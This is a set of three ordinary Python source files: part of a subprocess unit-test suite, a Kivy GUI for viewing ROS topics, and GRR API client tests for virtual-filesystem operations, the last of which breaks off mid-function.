@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn('KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
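        # Duplicate each fd that is about to be closed so it can be restored
        # afterwards; if fd 0 (stdin) is among them, pass the duplicate to the
        # child so it still has a readable stdin.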
newfds = []
for a in fds:
b = os.dup(a)
newfds.append(b)
if a == 0:
stdin = b
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = test_support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
for b, a in zip(newfds, fds):
os.dup2(b, a)
for b in newfds:
os.close(b)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = [os.dup(fd) for fd in range(3)]
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = test_support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
for std, saved in enumerate(saved_fds):
os.dup2(saved, std)
os.close(saved)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = test_support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" % stderr)
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(EnvironmentError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_pipe_cloexec(self):
# Issue 12786: check that the communication pipes' FDs are set CLOEXEC,
# and are not inherited by another child process.
p1 = subprocess.Popen([sys.executable, "-c",
'import os;'
'os.read(0, 1)'
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen([sys.executable, "-c", """if True:
import os, errno, sys
for fd in %r:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
else:
sys.exit(1)
sys.exit(0)
""" % [f.fileno() for f in (p1.stdin, p1.stdout,
p1.stderr)]
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
p1.communicate('foo')
_, stderr = p2.communicate()
self.assertEqual(p2.returncode, 0, "Unexpected error: " + repr(stderr))
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
        # We use hardcoded constants because we do not want to
        # depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
        # Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
@unittest.skipUnless(getattr(subprocess, '_has_poll', False),
"poll system call not supported")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
subprocess._has_poll = False
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._has_poll = True
ProcessTestCase.tearDown(self)
class HelperFunctionTests(unittest.TestCase):
@unittest.skipIf(mswindows, "errno and EINTR make no sense on windows")
def test_eintr_retry_call(self):
record_calls = []
def fake_os_func(*args):
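            # Record every call; raise EINTR only on the second call so the
            # retry helper has to loop exactly once, and otherwise return the
            # arguments reversed so pass-through can be verified.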
record_calls.append(args)
if len(record_calls) == 2:
raise OSError(errno.EINTR, "fake interrupted system call")
return tuple(reversed(args))
self.assertEqual((999, 256),
subprocess._eintr_retry_call(fake_os_func, 256, 999))
self.assertEqual([(256, 999)], record_calls)
# This time there will be an EINTR so it will loop once.
self.assertEqual((666,),
subprocess._eintr_retry_call(fake_os_func, 666))
self.assertEqual([(256, 999), (666,), (666,)], record_calls)
@unittest.skipUnless(mswindows, "mswindows only")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super(CommandsWithSpaces, self).setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super(CommandsWithSpaces, self).tearDown()
def with_spaces(self, *args, **kwargs):
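        # Run the command with stdout captured and check that the child echoed
        # back argc and the lower-cased argv, including the script path that
        # contains a space.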
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
ProcessTestCaseNoPoll,
HelperFunctionTests,
CommandsWithSpaces)
test_support.run_unittest(*unit_tests)
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
viewer.py
|
#Create Layout for GUI
from roshandlers.rosconnector import ROSConnector
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.uix.scrollview import ScrollView
from kivy.uix.checkbox import CheckBox
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from threading import Thread
from customwidgets.text import TextWidget
from customwidgets.plot import PlotWidget
from subscribers.subscriber import Subscriber
from signalslayout.signaldisplay import SignalDisplay
from signalslayout.signalselector import SignalSelector
from signalslayout.autoselector import WidgetSelect
from signalslayout.autoselector import AutoSelect
class SignalViewer(GridLayout):
signalselector=ObjectProperty(SignalSelector)
signaldisplay=ObjectProperty(SignalDisplay)
ros=ROSConnector()
counter=0
popup=ObjectProperty(None)
event=None
    # Dictionary of all topics, keyed by topic name:
    #   {topic_name: {'type': topic_type, 'active': True/False, 'subs': Subscriber or None}}
    topics_dict={}
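    # Note: topics_dict (like the other attributes above) is a class-level
    # attribute, so it is shared by all SignalViewer instances; with the
    # single viewer used here that is acceptable.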
def __init__(self,**kwargs):
super(SignalViewer,self).__init__(**kwargs)
Clock.schedule_once(lambda dt: self.initROS(), 2)
def initROS(self):
        # Connect to ROS in a background thread so the UI stays responsive
t = Thread(target=self.ros.connect)
t.start()
        self.event=Clock.schedule_interval(lambda dt: self.checkROS(), 1/10.0)
def checkROS(self):
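        # Called roughly every 0.1 s while connecting: after the first failed
        # check a "connecting" popup is shown, and after ~50 failed checks
        # (about 5 s) it switches to an error message. Once the connection is
        # up, the polling event is cancelled and the main UI is built.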
if not self.ros.isOK():
            self.counter=self.counter+1
if self.counter==1:
self.popup = Popup(title='Connecting to ROS',
content=Label(text='Attempting connection'),
size_hint=(None, None), size=(200, 200))
self.popup.open()
elif self.counter>50:
self.popup.content=Label(text='ERROR: verify ROS')
else:
if self.popup is not None: self.popup.dismiss()
self.event.cancel()
self.build()
def build(self):
#Fill the list of topics
self.signalselector.setreferences(self,self.signaldisplay)
self.signaldisplay.setreferences(self,self.signalselector)
topics_list=self.ros.get_published_topics()
self.generateTopicsDict(topics_list)
self.signalselector.build()
self.signaldisplay.build()
        # Experimental: auto-activate any topics selected by the AutoSelect
        # helper.
for topic_name in self.topics_dict:
if AutoSelect(topic_name):
print("AutoSelect: %s"%topic_name)
self.activateTopic(topic_name)
#####################################################
self.signalselector.populate()
self.enableUpdates()
def generateTopicsDict(self,topics_list):
#Take a list of topics and create the topics dictionary
for topic_entry in topics_list:
topic=topic_entry[0]
topic_type=topic_entry[1]
self.topics_dict[topic]={'type':topic_type,'active':False,'subs':None}
def enableUpdates(self):
self.event=Clock.schedule_interval(lambda dt: self.updateDisplay(), 1/10.0)
def disableUpdates(self):
self.event.cancel()
def updateDisplay(self):
self.signaldisplay.update()
def activateTopic(self,topic_name):
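        # Pause display updates while changing subscriptions. Create a
        # Subscriber for the topic and mark it active; if the topic type is
        # not supported, show an error popup instead. On success, ask
        # WidgetSelect for a display widget class, add it to the display, and
        # resume updates.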
self.disableUpdates()
topic_type=self.topics_dict[topic_name]['type']
print("activate %s of type %s"%(topic_name,topic_type))
failed=True
try:
sub=Subscriber(topic_name,topic_type)
self.topics_dict[topic_name]['active']=True
self.topics_dict[topic_name]['subs']=sub
failed=False
except Exception as e:
print(e)
error_str="%s: \n\rType not supported"%topic_type
self.popup = Popup(title='Error',content=Label(text=error_str),size_hint=(None, None), size=(200, 200))
self.popup.open()
self.signalselector.populate()
        if not failed:
            # Experimental: pick a display widget class for this topic type
            # via the WidgetSelect helper.
WidgetClass=WidgetSelect(topic_type)
print("Using widget:"+str(WidgetClass))
self.signaldisplay.add(topic_name,WidgetClass)
self.enableUpdates()
def deactivateTopic(self,topic_name):
self.disableUpdates()
topic_type=self.topics_dict[topic_name]['type']
print("deactivate %s of type %s"%(topic_name,topic_type))
self.topics_dict[topic_name]['active']=False
sub=self.topics_dict[topic_name]['subs']
sub.unsubscribe()
self.signaldisplay.remove(topic_name)
self.enableUpdates()
|
vfs_test.py
|
#!/usr/bin/env python
# Lint as: python3
# -*- encoding: utf-8 -*-
"""Tests for API client and VFS-related API calls."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import os
import threading
import time
import zipfile
from absl import app
import mock
from grr_api_client import errors
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import artifacts as rdf_artifacts
from grr_response_core.lib.rdfvalues import file_finder as rdf_file_finder
from grr_response_proto.api import vfs_pb2
from grr_response_server import artifact_registry
from grr_response_server.databases import db
from grr_response_server.flows.general import collectors
from grr_response_server.flows.general import file_finder
from grr_response_server.gui import api_integration_test_lib
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import action_mocks
from grr.test_lib import fixture_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
from grr.test_lib import vfs_test_lib
class ApiClientLibVfsTest(api_integration_test_lib.ApiIntegrationTest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibVfsTest, self).setUp()
self.client_id = self.SetupClient(0)
fixture_test_lib.ClientFixture(self.client_id)
def testGetFileFromRef(self):
file_ref = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads/a.txt")
self.assertEqual(file_ref.path, "fs/os/c/Downloads/a.txt")
file_obj = file_ref.Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads/a.txt")
self.assertFalse(file_obj.is_directory)
self.assertEqual(file_obj.data.name, "a.txt")
def testGetFileForDirectory(self):
file_obj = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads").Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads")
self.assertTrue(file_obj.is_directory)
def testListFiles(self):
files_iter = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads").ListFiles()
files_list = list(files_iter)
self.assertCountEqual(
[f.data.name for f in files_list],
["a.txt", "b.txt", "c.txt", "d.txt", "sub1", "中国新闻网新闻中.txt"])
def testGetBlob(self):
out = io.BytesIO()
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), b"Hello world")
def testGetBlobUnicode(self):
vfs_test_lib.CreateFile(
db.ClientPath.TSK("C.1000000000000000", ["c", "bin", "中国新闻网新闻中"]),
b"Hello world")
out = io.BytesIO()
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/bin/中国新闻网新闻中").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), b"Hello world")
def testGetBlobFailsWhenFileIsCorrupt(self):
_, blob_refs = vfs_test_lib.GenerateBlobRefs(10, "0")
# We write just the references, without actual data, simulating a case
# when blobs were not written to the blob store for some reason.
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.OS("C.1000000000000000", ["c", "bin", "test"]), blob_refs,
[])
out = io.BytesIO()
with self.assertRaises(errors.UnknownError):
self.api.Client(client_id=self.client_id).File(
"fs/os/c/bin/test").GetBlob().WriteToStream(out)
def testGetBlobWithOffset(self):
tsk = db.ClientPath.TSK("C.1000000000000000", ["c", "bin", "foobar"])
vfs_test_lib.CreateFile(tsk, b"Hello world")
out = io.BytesIO()
client = self.api.Client(client_id=self.client_id)
f = client.File("fs/tsk/c/bin/foobar")
f.GetBlobWithOffset(6).WriteToStream(out)
self.assertEqual(out.getvalue(), b"world")
def testGetBlobWithOffsetUnicode(self):
tsk = db.ClientPath.TSK("C.1000000000000000", ["c", "bin", "中"])
vfs_test_lib.CreateFile(tsk, b"Hello world")
out = io.BytesIO()
client = self.api.Client(client_id=self.client_id)
f = client.File("fs/tsk/c/bin/中")
f.GetBlobWithOffset(6).WriteToStream(out)
self.assertEqual(out.getvalue(), b"world")
def testGetFilesArchive(self):
timestamp = rdfvalue.RDFDatetime.Now()
zip_stream = io.BytesIO()
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/bin").GetFilesArchive().WriteToStream(zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertCountEqual(namelist, [
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/rbash",
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/bash"
])
for info in zip_fd.infolist():
self.assertGreater(info.compress_size, 0)
# Check that notification was pushed indicating the failure to the user.
pending_notifications = list(self.api.GrrUser().ListPendingNotifications(
timestamp=timestamp.AsMicrosecondsSinceEpoch()))
self.assertLen(pending_notifications, 1)
self.assertEqual(
pending_notifications[0].data.notification_type,
int(rdf_objects.UserNotification.Type.TYPE_FILE_ARCHIVE_GENERATED))
self.assertEqual(pending_notifications[0].data.reference.type,
pending_notifications[0].data.reference.VFS)
self.assertEqual(pending_notifications[0].data.reference.vfs.client_id,
self.client_id)
self.assertEqual(pending_notifications[0].data.reference.vfs.vfs_path,
"fs/tsk/c/bin")
def testGetFilesArchiveFailsWhenFirstFileBlobIsMissing(self):
_, blob_refs = vfs_test_lib.GenerateBlobRefs(10, "0")
# We write just the references, without actual data, simulating a case
# when blobs were not written to the blob store for some reason.
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.TSK("C.1000000000000000", ["c", "universe", "42"]),
blob_refs, [])
zip_stream = io.BytesIO()
timestamp = rdfvalue.RDFDatetime.Now()
with self.assertRaises(errors.UnknownError):
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/universe").GetFilesArchive().WriteToStream(zip_stream)
# Check that notification was pushed indicating the failure to the user.
pending_notifications = list(self.api.GrrUser().ListPendingNotifications(
timestamp=timestamp.AsMicrosecondsSinceEpoch()))
self.assertLen(pending_notifications, 1)
self.assertEqual(
pending_notifications[0].data.notification_type,
int(rdf_objects.UserNotification.Type
.TYPE_FILE_ARCHIVE_GENERATION_FAILED))
self.assertEqual(pending_notifications[0].data.reference.type,
pending_notifications[0].data.reference.VFS)
self.assertEqual(pending_notifications[0].data.reference.vfs.client_id,
self.client_id)
self.assertEqual(pending_notifications[0].data.reference.vfs.vfs_path,
"fs/tsk/c/universe")
def testGetFilesArchiveDropsStreamingResponsesWhenSecondFileBlobIsMissing(
self):
blob_data, blob_refs = vfs_test_lib.GenerateBlobRefs(1024 * 1024 * 10, "01")
# We write just the references, without actual data, simulating a case
# when blobs were not written to the blob store for some reason.
vfs_test_lib.CreateFileWithBlobRefsAndData(
db.ClientPath.TSK("C.1000000000000000", ["c", "universe", "42"]),
blob_refs, blob_data[:1])
zip_stream = io.BytesIO()
timestamp = rdfvalue.RDFDatetime.Now()
self.api.Client(client_id=self.client_id).File(
"fs/tsk/c/universe").GetFilesArchive().WriteToStream(zip_stream)
with self.assertRaises(zipfile.BadZipfile):
zipfile.ZipFile(zip_stream)
# Check that notification was pushed indicating the failure to the user.
pending_notifications = list(self.api.GrrUser().ListPendingNotifications(
timestamp=timestamp.AsMicrosecondsSinceEpoch()))
self.assertLen(pending_notifications, 1)
self.assertEqual(
pending_notifications[0].data.notification_type,
int(rdf_objects.UserNotification.Type
.TYPE_FILE_ARCHIVE_GENERATION_FAILED))
self.assertEqual(pending_notifications[0].data.reference.type,
pending_notifications[0].data.reference.VFS)
self.assertEqual(pending_notifications[0].data.reference.vfs.client_id,
self.client_id)
self.assertEqual(pending_notifications[0].data.reference.vfs.vfs_path,
"fs/tsk/c/universe")
def testGetVersionTimes(self):
vtimes = self.api.Client(client_id=self.client_id).File(
"fs/os/c/Downloads/a.txt").GetVersionTimes()
self.assertLen(vtimes, 1)
def testRefresh(self):
operation = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads").Refresh()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testRefreshWaitUntilDone(self):
f = self.api.Client(client_id=self.client_id).File("fs/os/c/Downloads")
with flow_test_lib.TestWorker():
operation = f.Refresh()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
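        # Finish the flow from a background thread after a short delay while
        # the main thread blocks in WaitUntilDone() below.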
time.sleep(1)
flow_test_lib.FinishAllFlowsOnClient(self.client_id)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testRefreshRecursively(self):
operation = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads").RefreshRecursively(
max_depth=5)
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testRefreshRecursivelyWaitUntilDone(self):
f = self.api.Client(client_id=self.client_id).File("fs/os/c/Downloads")
with flow_test_lib.TestWorker():
operation = f.RefreshRecursively(max_depth=5)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
flow_test_lib.FinishAllFlowsOnClient(self.client_id)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testCollect(self):
operation = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads/a.txt").Collect()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testCollectWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_id).File("fs/os/c/Downloads/a.txt")
with flow_test_lib.TestWorker():
operation = f.Collect()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
flow_test_lib.FinishAllFlowsOnClient(self.client_id)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testFileFinderIndicatesCollectedSizeAfterCollection(self):
client_ref = self.api.Client(client_id=self.client_id)
    # TODO(user): for symlink-related test scenarios, this should require
# follow_links to be True. However, unlike the ClientFileFinder test
# below, this one doesn't care about this setting. Fix the
# FileFinder/ClientFileFinder behavior to match each other.
args = rdf_file_finder.FileFinderArgs(
paths=[os.path.join(self.base_path, "numbers.txt")],
action=rdf_file_finder.FileFinderAction.Download()).AsPrimitiveProto()
client_ref.CreateFlow(name=file_finder.FileFinder.__name__, args=args)
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=action_mocks.FileFinderClientMock())
f = client_ref.File("fs/os" +
os.path.join(self.base_path, "numbers.txt")).Get()
self.assertNotEqual(f.data.hash.sha256, b"")
self.assertGreater(f.data.hash.num_bytes, 0)
self.assertGreater(f.data.last_collected, 0)
self.assertGreater(f.data.last_collected_size, 0)
def testClientFileFinderIndicatesCollectedSizeAfterCollection(self):
client_ref = self.api.Client(client_id=self.client_id)
args = rdf_file_finder.FileFinderArgs(
paths=[os.path.join(self.base_path, "numbers.txt")],
action=rdf_file_finder.FileFinderAction.Download(),
follow_links=True).AsPrimitiveProto()
client_ref.CreateFlow(name=file_finder.ClientFileFinder.__name__, args=args)
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=action_mocks.ClientFileFinderClientMock())
f = client_ref.File("fs/os" +
os.path.join(self.base_path, "numbers.txt")).Get()
self.assertNotEqual(f.data.hash.sha256, b"")
self.assertGreater(f.data.hash.num_bytes, 0)
self.assertGreater(f.data.last_collected, 0)
self.assertGreater(f.data.last_collected_size, 0)
def testGetFileIndicatesCollectedSizeAfterCollection(self):
# Find the file with FileFinder stat action, so that we can reference it
# and trigger "Collect" operation on it.
client_ref = self.api.Client(client_id=self.client_id)
args = rdf_file_finder.FileFinderArgs(
paths=[os.path.join(self.base_path, "numbers.txt")],
action=rdf_file_finder.FileFinderAction.Stat()).AsPrimitiveProto()
client_ref.CreateFlow(name=file_finder.FileFinder.__name__, args=args)
client_mock = action_mocks.FileFinderClientMock()
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=client_mock)
f = client_ref.File("fs/os" + os.path.join(self.base_path, "numbers.txt"))
with flow_test_lib.TestWorker():
operation = f.Collect()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
flow_test_lib.FinishAllFlowsOnClient(
self.client_id, client_mock=client_mock)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
f = f.Get()
self.assertNotEqual(f.data.hash.sha256, b"")
self.assertGreater(f.data.hash.num_bytes, 0)
self.assertGreater(f.data.last_collected, 0)
self.assertGreater(f.data.last_collected_size, 0)
def testArtifactCollectorIndicatesCollectedSizeAfterCollection(self):
registry_stub = artifact_registry.ArtifactRegistry()
source = rdf_artifacts.ArtifactSource(
